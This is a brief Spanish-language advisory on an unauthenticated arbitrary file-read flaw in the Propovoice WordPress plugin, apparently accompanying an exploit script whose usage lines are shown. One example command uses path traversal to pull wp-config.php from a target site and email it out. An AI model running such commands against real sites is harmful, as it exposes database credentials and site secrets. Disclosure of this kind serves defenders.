
Propovoice <= 1.7.6.7 - Lectura arbitraria de archivos sin autenticación
Propovoice <= 1.7.6.7 - Lectura arbitraria de archivos no autenticada
El complemento Propovoice: All-in-One Client Management System para WordPress es vulnerable a la lectura arbitraria de archivos en todas las versiones hasta la 1.7.6.7 inclusive, a través de la función send_email(). Esto permite que atacantes no autenticados lean el contenido de archivos arbitrarios en el servidor, que pueden contener información sensible.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php